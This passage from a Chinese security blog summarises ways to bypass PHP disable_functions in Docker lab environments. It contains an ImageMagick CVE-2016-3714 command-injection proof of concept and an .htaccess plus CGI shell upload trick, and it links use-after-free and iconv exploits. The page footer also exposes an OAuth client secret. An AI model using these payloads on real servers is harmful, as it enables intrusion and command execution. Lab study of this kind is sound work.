class="hljs-string">&#x27;cmd&#x27;</span>];<br><span class="hljs-keyword">if</span> (<span class="hljs-variable">$command</span> == <span class="hljs-string">&#x27;&#x27;</span>) &#123;<br>    <span class="hljs-variable">$command</span> = <span class="hljs-string">&#x27;id&#x27;</span>;<br>&#125;<br><br><span class="hljs-variable">$exploit</span> = <span class="hljs-string">&lt;&lt;&lt;EOF</span><br><span class="hljs-string">push graphic-context</span><br><span class="hljs-string">viewbox 0 0 640 480</span><br><span class="hljs-string">fill &#x27;url(https://example.com/image.jpg&quot;|<span class="hljs-subst">$command</span>&quot;)&#x27;</span><br><span class="hljs-string">pop graphic-context</span><br><span class="hljs-string">EOF</span>;<br><br>file_put_contents(<span class="hljs-string">&quot;KKKK.mvg&quot;</span>, <span class="hljs-variable">$exploit</span>);<br><span class="hljs-variable">$thumb</span> = <span class="hljs-keyword">new</span> Imagick();<br><span class="hljs-variable">$thumb</span>-&gt;readImage(<span class="hljs-string">&#x27;KKKK.mvg&#x27;</span>);<br><span class="hljs-variable">$thumb</span>-&gt;writeImage(<span class="hljs-string">&#x27;KKKK.png&#x27;</span>);<br><span class="hljs-variable">$thumb</span>-&gt;clear();<br><span class="hljs-variable">$thumb</span>-&gt;destroy();<br>unlink(<span class="hljs-string">&quot;KKKK.mvg&quot;</span>);<br>unlink(<span class="hljs-string">&quot;KKKK.png&quot;</span>);<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>
<p>漏洞原理参考p牛文章:<a target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/CVE-2016-3714-ImageMagick.html">https://www.leavesongs.com/PENETRATION/CVE-2016-3714-ImageMagick.html</a></p>
<h3 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h3><p>获取和运行镜像</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">docker</span> pull medicean/vulapps:i_imagemagick_<span class="hljs-number">1</span><br><span class="hljs-attribute">docker</span> run -d -p <span class="hljs-number">8000</span>:<span class="hljs-number">80</span> --name=i_imagemagick_<span class="hljs-number">1</span> medicean/vulapps:i_imagemagick_<span class="hljs-number">1</span><br></code></pre></td></tr></table></figure>
<p>访问<code>phpinfo.php</code>,发现开启了imagemagick服务<br><img src="/img/bypass_disable_function/42.png" srcset="/img/loading.gif" lazyload></p>
<p>进入容器:<code>docker run -t -i medicean/vulapps:i_imagemagick_1  &quot;/bin/bash&quot;</code></p>
<p><img src="/img/bypass_disable_function/38.png" srcset="/img/loading.gif" lazyload></p>
<p>查看<code>poc.php</code>,这其实是已经写好的poc,执行命令就是<code>ls -la</code><br><img src="/img/bypass_disable_function/39.png" srcset="/img/loading.gif" lazyload></p>
<p>验证poc,在容器外执行<code>docker exec i_imagemagick_1 convert /poc.png 1.png</code><br><img src="/img/bypass_disable_function/40.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="利用-Apache-Mod-CGI"><a href="#利用-Apache-Mod-CGI" class="headerlink" title="利用 Apache Mod CGI"></a>利用 Apache Mod CGI</h2><p>利用条件:</p>
<ul>
<li>Apache + PHP (apache 使用 apache_mod_php)</li>
<li>Apache 开启了 cgi, rewrite</li>
<li>Web 目录给了 AllowOverride 权限</li>
</ul>
<h3 id="关于mod-cgi是什么"><a href="#关于mod-cgi是什么" class="headerlink" title="关于mod_cgi是什么"></a>关于mod_cgi是什么</h3><p><a target="_blank" rel="noopener" href="http://httpd.apache.org/docs/current/mod/mod_cgi.html">http://httpd.apache.org/docs/current/mod/mod_cgi.html</a><br>任何具有MIME类型application/x-httpd-cgi或者被cgi-script处理器处理的文件都将被作为CGI脚本对待并由服务器运行，它的输出将被返回给客户端。可以通过两种途径使文件成为CGI脚本，一种是文件具有已由AddType指令定义的扩展名，另一种是文件位于ScriptAlias目录中。<br>当Apache 开启了cgi, rewrite时，我们可以利用.htaccess文件，临时允许一个目录可以执行cgi程序并且使得服务器将自定义的后缀解析为cgi程序，则可以在目的目录下使用.htaccess文件进行配置。</p>
<h3 id="如何利用"><a href="#如何利用" class="headerlink" title="如何利用"></a>如何利用</h3><p>由于环境搭建困难,使用蚁剑的<a target="_blank" rel="noopener" href="https://github.com/AntSwordProject/AntSword-Labs">docker</a><br><img src="/img/bypass_disable_function/21.png" srcset="/img/loading.gif" lazyload></p>
<p>在web目录下上传<code>.htaccess</code>文件</p>
<figure class="highlight gradle"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs gradle"><span class="hljs-keyword">Options</span> +ExecCGI<br>AddHandler cgi-script .<span class="hljs-keyword">ant</span><br></code></pre></td></tr></table></figure>
<p>上传shell.ant</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-meta">#!/bin/sh</span><br><span class="hljs-built_in">echo</span> Content-type: text/html<br><span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;&quot;</span><br><span class="hljs-built_in">echo</span>&amp;&amp;id<br></code></pre></td></tr></table></figure>
<p>由于目标是liunx系统,linux中CGI比较严格。这里也需要去liunx系统创建文件上传,如果使用windows创建文件并上传是无法解析的。<br><img src="/img/bypass_disable_function/22.png" srcset="/img/loading.gif" lazyload></p>
<p>直接访问shell.xxx ,这里报错,是因为没有权限访问<br><img src="/img/bypass_disable_function/19.png" srcset="/img/loading.gif" lazyload></p>
<p>直接使用蚁剑修改权限<br><img src="/img/bypass_disable_function/20.png" srcset="/img/loading.gif" lazyload></p>
<p>复现成功<br><img src="/img/bypass_disable_function/23.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="利用攻击PHP-FPM"><a href="#利用攻击PHP-FPM" class="headerlink" title="利用攻击PHP-FPM"></a>利用攻击PHP-FPM</h2><p>利用条件</p>
<ul>
<li>Linux 操作系统</li>
<li>PHP-FPM</li>
<li>存在可写的目录, 需要上传 .so 文件</li>
</ul>
<p>关于什么是PHP-FPM,这个可以看<a target="_blank" rel="noopener" href="https://www.php.cn/php-weizijiaocheng-455614.html">https://www.php.cn/php-weizijiaocheng-455614.html</a><br>关于如何攻击PHP-FPM,请看这篇<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/5598">浅析php-fpm的攻击方式</a></p>
<p>蚁剑环境</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs awk">git clone https:<span class="hljs-regexp">//gi</span>thub.com<span class="hljs-regexp">/AntSwordProject/</span>AntSword-Labs.git<br>cd AntSword-Labs<span class="hljs-regexp">/bypass_disable_functions/</span><span class="hljs-number">5</span><br>docker-compose up -d<br></code></pre></td></tr></table></figure>

<p>连接shell后无法执行命令<br><img src="/img/bypass_disable_function/27.png" srcset="/img/loading.gif" lazyload></p>
<p>查看phpinfo,发现目标主机配置了<code>FPM/Fastcgi</code><br><img src="/img/bypass_disable_function/26.png" srcset="/img/loading.gif" lazyload></p>
<p>使用插件<br><img src="/img/bypass_disable_function/28.png" srcset="/img/loading.gif" lazyload></p>
<p>要注意该模式下需要选择 PHP-FPM 的接口地址，需要自行找配置文件查 FPM 接口地址，本例中PHP-FPM 的接口地址，发现是 127.0.0.1:9000,所以这里改为127.0.0.1：9000<br><img src="/img/bypass_disable_function/29.png" srcset="/img/loading.gif" lazyload></p>
<p>但是这里我死活利用不了<br><img src="/img/bypass_disable_function/30.png" srcset="/img/loading.gif" lazyload></p>
<p>这里换了几个版本还是不行，但看网上师傅利用是没问题的<br>有感兴趣想复现师傅看这里:<a target="_blank" rel="noopener" href="https://github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions/5">https://github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions/5</a></p>
<h2 id="利用-GC-UAF"><a href="#利用-GC-UAF" class="headerlink" title="利用 GC UAF"></a>利用 GC UAF</h2><p>利用条件</p>
<ul>
<li>Linux 操作系统</li>
<li>PHP7.0 - all versions to date</li>
<li>PHP7.1 - all versions to date</li>
<li>PHP7.2 - all versions to date</li>
<li>PHP7.3 - all versions to date</li>
</ul>
<p><a target="_blank" rel="noopener" href="https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php">EXP</a><br><a target="_blank" rel="noopener" href="http://3xp10it.cc/%E4%BA%8C%E8%BF%9B%E5%88%B6/2017/04/19/PHP%E4%B8%AD%E7%9A%84%E5%86%85%E5%AD%98%E7%A0%B4%E5%9D%8F%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%AD%A6%E4%B9%A0(1st)/">关于原理</a><br>通过PHP垃圾收集器中堆溢出来绕过 disable_functions 并执行系统命令。</p>
<p>搭建环境</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs awk">cd AntSword-Labs<span class="hljs-regexp">/bypass_disable_functions/</span><span class="hljs-number">6</span><br>docker-compose up -d<br></code></pre></td></tr></table></figure>

<p>受到disable_function无法执行命令<br><img src="/img/bypass_disable_function/32.png" srcset="/img/loading.gif" lazyload></p>
<p>使用插件成功执行后弹出一个新的虚拟终端，成功bypass<br><img src="/img/bypass_disable_function/31.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="利用-Json-Serializer-UAF"><a href="#利用-Json-Serializer-UAF" class="headerlink" title="利用 Json Serializer UAF"></a>利用 Json Serializer UAF</h2><p>利用条件</p>
<ul>
<li>Linux 操作系统</li>
<li>PHP7.1 - all versions to date</li>
<li>PHP7.2 &lt; 7.2.19 (released: 30 May 2019)</li>
<li>PHP7.3 &lt; 7.3.6 (released: 30 May 2019)</li>
</ul>
<p><a target="_blank" rel="noopener" href="https://bugs.php.net/bug.php?id=77843">利用漏洞</a><br><a target="_blank" rel="noopener" href="https://github.com/mm0r1/exploits/blob/master/php-json-bypass/exploit.php">POC</a></p>
<p>上传POC到<code>/var/tmp</code>目录下<br><img src="/img/bypass_disable_function/33.png" srcset="/img/loading.gif" lazyload></p>
<p>包含bypass文件</p>
<p><img src="/img/bypass_disable_function/34.png" srcset="/img/loading.gif" lazyload></p>
<p>也可以稍作修改</p>
<p><img src="/img/bypass_disable_function/35.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="/img/bypass_disable_function/36.png" srcset="/img/loading.gif" lazyload></p>
<p>当然使用插件是最简单的</p>
<p><img src="/img/bypass_disable_function/37.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="利用Backtrace-UAF"><a href="#利用Backtrace-UAF" class="headerlink" title="利用Backtrace UAF"></a>利用Backtrace UAF</h2><p>利用条件</p>
<ul>
<li>Linux 操作系统</li>
<li>PHP7.0 - all versions to date</li>
<li>PHP7.1 - all versions to date</li>
<li>PHP7.2 - all versions to date</li>
<li>PHP7.3 &lt; 7.3.15 (released 20 Feb 2020)</li>
<li>PHP7.4 &lt; 7.4.3 (released 20 Feb 2020)</li>
</ul>
<p><a target="_blank" rel="noopener" href="https://bugs.php.net/bug.php?id=76047">利用漏洞</a><br><a target="_blank" rel="noopener" href="https://github.com/mm0r1/exploits/tree/master/php7-backtrace-bypass">EXP</a></p>
<h2 id="利用iconv"><a href="#利用iconv" class="headerlink" title="利用iconv"></a>利用iconv</h2><p>利用条件</p>
<ul>
<li>Linux 操作系统</li>
<li><code>putenv</code></li>
<li><code>iconv</code></li>
<li>存在可写的目录, 需要上传 <code>.so</code> 文件</li>
</ul>
<p>利用原理分析<a target="_blank" rel="noopener" href="https://hugeh0ge.github.io/2019/11/04/Getting-Arbitrary-Code-Execution-from-fopen-s-2nd-Argument/">https://hugeh0ge.github.io/2019/11/04/Getting-Arbitrary-Code-Execution-from-fopen-s-2nd-Argument/</a></p>
<p>利用复现:<br>获得镜像</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs awk">git clone https:<span class="hljs-regexp">//gi</span>thub.com<span class="hljs-regexp">/AntSwordProject/</span>AntSword-Labs.git<br>cd AntSword-Labs<span class="hljs-regexp">/bypass_disable_functions/</span><span class="hljs-number">9</span><br>docker-compose up -d<br></code></pre></td></tr></table></figure>
<p>无法执行命令<br><img src="/img/bypass_disable_function/44.png" srcset="/img/loading.gif" lazyload></p>
<p>使用iconv插件bypass<br><img src="/img/bypass_disable_function/43.png" srcset="/img/loading.gif" lazyload></p>
<p>创建副本后,将url改为<code>/.antproxy.php</code><br><img src="/img/bypass_disable_function/45.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="/img/bypass_disable_function/46.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="Reference"><a href="#Reference" class="headerlink" title="Reference"></a>Reference</h2><p><a target="_blank" rel="noopener" href="https://www.mi1k7ea.com/2019/06/02/%E6%B5%85%E8%B0%88%E5%87%A0%E7%A7%8DBypass-disable-functions%E7%9A%84%E6%96%B9%E6%B3%95/#Bypass-3">https://www.mi1k7ea.com/2019/06/02/%E6%B5%85%E8%B0%88%E5%87%A0%E7%A7%8DBypass-disable-functions%E7%9A%84%E6%96%B9%E6%B3%95/#Bypass-3</a><br><a target="_blank" rel="noopener" href="https://whoamianony.top/2021/03/13/Web%E5%AE%89%E5%85%A8/Bypass%20Disable_functions/">https://whoamianony.top/2021/03/13/Web%E5%AE%89%E5%85%A8/Bypass%20Disable_functions/</a><br><a target="_blank" rel="noopener" href="https://clq0.top/bypass-disable_function-php/#iconv">https://clq0.top/bypass-disable_function-php/#iconv</a><br><a target="_blank" rel="noopener" href="https://github.com/AntSwordProject/AntSword-Labs">https://github.com/AntSwordProject/AntSword-Labs</a><br><a target="_blank" rel="noopener" href="https://www.leavesongs.com/PHP/php-bypass-disable-functions-by-CVE-2014-6271.html">https://www.leavesongs.com/PHP/php-bypass-disable-functions-by-CVE-2014-6271.html</a></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处，表明作者SD！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2021/08/14/bypass_open_basedir/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Bypass open_basedir总结</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/07/31/cpl/">
                        <span class="hidden-mobile">巧用cpl文件维权和免杀</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments" lazyload>
                
                  
                
                
  <div id="gitalk-container"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#gitalk-container', function() {
      Fluid.utils.createCssLink('/css/gitalk.css')
      Fluid.utils.createScript('https://cdn.jsdelivr.net/npm/gitalk@1.7.2/dist/gitalk.min.js', function() {
        var options = Object.assign(
          {"clientID":"d3fed93d8ca9dd026b6a","clientSecret":"b3ebb466a8206df623c10df13110073b40137bdb","repo":"SD-XD.github.io","owner":"SD-XD","admin":["SD-XD"],"language":"zh-CN","labels":["Gitalk"],"perPage":10,"pagerDirection":"last","distractionFreeMode":true,"createIssueManually":true,"proxy":"https://cors-anywhere.azm.workers.dev/https://github.com/login/oauth/access_token"},
          {
            id: '5de34e383c177f4bec8d118df5ad4137'
          }
        )
        var gitalk = new Gitalk(options);
        gitalk.render('gitalk-container');
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.3/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.1/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js" ></script>



  <script  src="/js/local-search.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.12/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>












  

  

  

  

  

  





<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
